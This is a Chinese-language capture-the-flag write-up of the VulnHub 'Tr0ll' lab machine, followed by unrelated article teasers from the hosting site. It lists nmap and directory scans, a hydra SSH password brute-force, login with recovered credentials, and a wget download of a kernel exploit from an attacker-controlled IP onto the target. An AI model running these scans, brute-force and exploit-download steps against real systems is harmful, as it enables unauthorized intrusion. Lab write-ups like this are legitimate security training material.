vulnhub-Tr0ll ssh爆破、wireshark流量分析,exp、尋找flag。思維導圖帶你清晰拿到所以flag

vulnhub-Tr0ll ssh爆破、wireshark流量分析,exp、尋找flag。思維導圖帶你清晰拿到所以flag

1、主機發現

arp-scan -l

2、端口掃描

nmap?-sS?-sV?192.168.66.185
nmap?-sS?-A?-T4?-p-?192.168.66.185
nmap?--script=vuln?192.168.66.185

經典掃描三件套,詳細、簡略包括歷史漏洞都掃描一下

PORT???STATE?SERVICE?VERSION
21/tcp?open??ftp?????vsftpd?3.0.2
ftp-anon:?Anonymous?FTP?login?allowed?(FTP?code?230)22/tcp?open??ssh?????OpenSSH?6.6.1p1?Ubuntu?2ubuntu2?(Ubuntu?Linux;?protocol?2.0)80/tcp?open??http????Apache?httpd?2.4.7?((Ubuntu))這里一個匿名訪問,我們登錄看看什么情況

賬號:anonymous 這里有個文件我們下載下來是一個pcap文件,我們看看是什么情況

這里找到了一些文字,沒懂,是讓我們找這個東西吧

我們去看看80端口

有點抽象的,源代碼什么也沒有,估計是其他文件了

爺笑了,好像在耍我

3、目錄掃描

gobuster?dir?-u?http://192.168.66.187:80?-t30?-w?/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
dirsearch?-u?http://192.168.66.187:80/?-e?*?-i?200
nikto?-h?192.168.66.187?-p?80

4、尋找突破口

我們根據pacp文件里面觀察到他好像開了一個監聽

這里有一種思路就是跟著pacp文件走,就是他干了什么我們跟著做或許有收獲,當然是因為80端口沒信息,可能是兔子窩

這里像敲門啊,這么多端口

這里后來看了wp次啊知道,這東西是訪問端口,前四位是ip,第五位乘256加上第六位就是訪問的端口

這里其實我們早就找到了這個東西,哪就嘗試爆破或者ssh之類的嘗試一下

這里我們把這個目錄下文件下載下來可以執行,然后多出了一個目錄,我們再次訪問

兩個文件夾,我們看看有什么信息

因該是ssh賬戶,一會兒hydra爆一下

這里是密碼,爆破一下吧

hydra?-L?1.txt?-P?/usr/share/wordlists/rockyou.txt?192.168.66.187?ssh
這里可以更改一下字典了,因為他都給我們寫出來了hydra?-L?user.txt?-P?passwd.txt?192.168.66.187?ssh

爺笑了,他說絕對不是gen哪個密碼,靶機最怕這個,誰知道藏了什么東西

賬戶: maleus ps-aux felux Eagle11 genphlux < -- Definitely not this one usmc8892 blawrg wytshadow vis1t0r overflow

密碼: Good_job_:)

這里給爺整笑了,說是包含密碼,結果密碼是Pass.txt

5、ssh連接

連接一下ssh ssh overflow@192.168.66.187

查看系統內核和版本信息

uname -a lsb_release -a

6、尋找exp

查看一下如何使用

我們先把這個exp傳輸到靶機中

wget http://192.168.66.129/37292.c

這張圖片是一個wp中的寫的,這種圖片確實思路更清晰,下次我也要試試這種思維導圖

絲滑小連招拿下flag 后續我也會出更多打靶文章,希望大家關注!謝謝

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/web/72971.shtml
繁體地址,請注明出處:http://hk.pswp.cn/web/72971.shtml
英文地址,請注明出處:http://en.pswp.cn/web/72971.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

強化學習(趙世鈺版)-學習筆記(8.值函數方法)

本章是算法與方法的第四章&#xff0c;是TD算法的拓展&#xff0c;本質上是將狀態值與行為值的表征方式&#xff0c;從離散的表格形式&#xff0c;拓展到了連續的函數形式。 表格形式的優點是直觀&#xff0c;便于分析&#xff0c;缺點是數據量較大或者連續性狀態或者行為空間時…

[特殊字符] 2025藍橋杯備賽Day7——B2117 整理藥名

&#x1f50d; 2025藍橋杯備賽Day7——B2117 整理藥名 題目難度&#xff1a;?? 適合掌握字符串基礎操作 考察重點&#xff1a;大小寫轉換、字符串遍歷、邊界條件處理 B2117 整理藥名 題目描述 醫生在書寫藥品名的時候經常不注意大小寫&#xff0c;格式比較混亂。現要求你…

笛卡爾軌跡規劃之齊次變換矩陣與歐拉角、四元數的轉化

一、笛卡爾軌跡規劃需求 笛卡爾軌跡規劃本質就是我們對機械臂的末端位置和姿態進行規劃&#xff0c;其實也就是對末端坐標系的位姿進行規劃。我們清楚末端坐標系的位姿是可以用齊次變換矩陣T來表示的&#xff0c;但這樣表示的話&#xff0c;并不利于我們去做規劃&#xff0c;所…

【PCIe 總線及設備入門學習專欄 3.1 -- PCIe 中為何只有 TLP 會被 Switch 和 RC 進行路由?】

文章目錄 Overview為什么 DLLP 不需要路由呢?總結Overview 這里介紹些為什么在 PCIe 中只有 TLP(事務層數據包)會被 Switch 和 Root Complex(RC) 路由,而 DLLP(數據鏈路層數據包)和 Ordered Set 不會被路由。這是因為 TLP 起始于源端口的事務層,結束于目的端口的事務…

大摩閉門會:250321 學習總結報告

如果圖片分辨率不足&#xff0c;可右鍵圖片在新標簽打開圖片或者下載末尾源文件進行查看 本文只是針對視頻做相應學術記錄&#xff0c;進行學習討論使用

深入理解 Spring Boot 應用的生命周期:從啟動到關閉的全流程解析

引言 Spring Boot 是當今 Java 開發中最流行的框架之一&#xff0c;它以簡化配置和快速開發著稱。然而&#xff0c;要真正掌握 Spring Boot&#xff0c;理解其應用的生命周期是至關重要的。本文將深入探討 Spring Boot 應用的生命周期&#xff0c;從啟動到關閉的各個階段&…

期刊分區表2025年名單下載(經濟學、管理學)

2025年期刊分區表包括SCIE、SSCI、A&HCI、ESCI和OAJ&#xff0c;共設置了包括自然科學、社會科學和人文科學在內的21個大類 本次分享的是期刊分區表2025年名單經濟學類、管理學類&#xff0c;一共7631025條 一、數據介紹 數據名稱&#xff1a;期刊分區表2025年名單 數據…

夢回杭州...

她對我說&#xff0c;煙雨中的西湖更別有情趣&#xff0c;我也懷著對‘人間天堂’的憧憬踏上了向往之旅。第一次親密接觸沒有感覺中那么好&#xff0c;現在想起來是那時的人和心情都沒能安靜下來&#xff0c;去慢慢品味它的美。 六下杭州&#xff0c;親歷每一片風景&#xff0c…

深度優先搜索(DFS)完全解析:從原理到 Java 實戰

深度優先搜索&#xff08;DFS&#xff09;完全解析&#xff1a;從原理到 Java 實戰 TOC 作為一名程序員&#xff0c;你是否遇到過需要在復雜的圖結構中尋找路徑、檢測環&#xff0c;或者進行樹遍歷的問題&#xff1f;深度優先搜索&#xff08;Depth-First Search, DFS&#xf…

【人工智能】如何理解transformer中的token?

如何理解transformer中的token? **一、Token在Transformer中的作用****二、文本分詞的常見方法****1. 基于詞典的分詞&#xff08;Dictionary-based Tokenization&#xff09;****2. 子詞分詞&#xff08;Subword Tokenization&#xff09;****(1) WordPiece算法****(2) BPE&a…

AI風向標《AI與視頻制作全攻略:從入門到精通實戰課程》

課程信息 AI風向標《AI與視頻制作全攻略&#xff1a;從入門到精通實戰課程》,夸克網盤和百度網盤課程。 課程介紹 《AI與視頻制作全攻略&#xff1a;從入門到精通實戰課程》是一套全面融合AI技術與視頻制作的實戰課程&#xff0c;旨在幫助創作者從基礎軟件使用到高級視頻剪輯…

mayfly-go開源的一站式 Web 管理平臺

mayfly-go 是一款開源的一站式 Web 管理平臺&#xff0c;旨在通過統一的界面簡化 Linux 服務器、數據庫&#xff08;如 MySQL、PostgreSQL、Redis、MongoDB 等&#xff09;的運維管理。以下從多個維度對其核心特性、技術架構、應用場景及生態進行詳細解析&#xff1a; 一、核心…

車輛模型——運動學模型

文章目錄 約束及系統移動機器人運動學模型&#xff08;Kinematic Model&#xff09;自行車模型含有加速度 a a a 的自行車模型系統偏差模型 在機器人的研究領域中&#xff0c;移動機器人的系統建模與分析是極為關鍵的基礎環節&#xff0c;本文以非完整約束的輪式移動機器人為研…

go命令使用

查看配置信息 go env配置go國內源 export GO111MODULEon export GOPROXYhttps://goproxy.cn測試 go install github.com/jesseduffield/lazydockerlatesthttps://github.com/jesseduffield/lazydocker

Chrome-Edge-IDEA-Win 常用插件-工具包

Chrome-Edge-IDEA-Win 常用插件-工具包 Chrome-Edge-IDEA-Win 常用插件-工具包谷歌插件chropathJSONViewOctotree - GitHub code treeXPath Helper書簽側邊欄篡改猴Print Edit WEEdge瀏覽器插件IDEA插件CodeGlance Pro 代碼迷你縮放圖插件Alibaba Cloud ToolkitAlibaba Java Co…

西門子V90伺服系統介紹

深入淺出地了解V90伺服驅動系統的核心特性和優勢&#xff0c;掌握其自動優化功能&#xff0c;使設備獲得更高的動態性能&#xff1b;同時&#xff0c;了解其自動抑制機械諧振頻率的特性&#xff0c;有助于在實際應用中減少機械振動和噪音。 方便快捷地熟悉V90的使用方式。通過伺…

【FastGPT】利用知識庫創建AI智能助手

【FastGPT】利用知識庫創建AI智能助手 摘要創建知識庫上傳文檔創建應用準備提示詞準備開場白關聯知識庫AI回答效果 摘要 關于FastGPT的部署&#xff0c;官方提供了docker-compose方式的部署文檔&#xff0c;如果使用的是podman和podman-compose的同學&#xff0c;可以參考這篇…

最新!Ubuntu Docker 安裝教程

源自: AINLPer&#xff08;每日干貨分享&#xff01;&#xff01;&#xff09; 編輯: ShuYini 校稿: ShuYini 時間: 2025-3-1 更多&#xff1a;>>>>大模型/AIGC、學術前沿的知識分享&#xff01; 看到很多部署大模型的時候&#xff0c;都是基于docker安裝部署的。…

html5炫酷3D立體文字效果實現詳解

炫酷3D立體文字效果實現詳解 這里寫目錄標題 炫酷3D立體文字效果實現詳解項目概述技術實現要點1. 基礎布局設置2. 動態背景效果3. 文字漸變效果4. 立體陰影效果5. 懸浮動畫效果 技術難點及解決方案1. 文字漸變動畫2. 立體陰影效果3. 性能優化 瀏覽器兼容性總結 項目概述 在這個…

電腦如何設置幾分鐘后自動關機

摘要&#xff1a;本文提供Windows、macOS和Linux系統設置定時自動關機的詳細方法。 目錄 一、Windows系統設置方法 設置定時關機 取消關機計劃 二、macOS系統設置方法 設置定時關機取消關機計劃 三、Linux系統設置方法 設置定時關機 取消關機計劃 四、注意事項五、擴展&#x…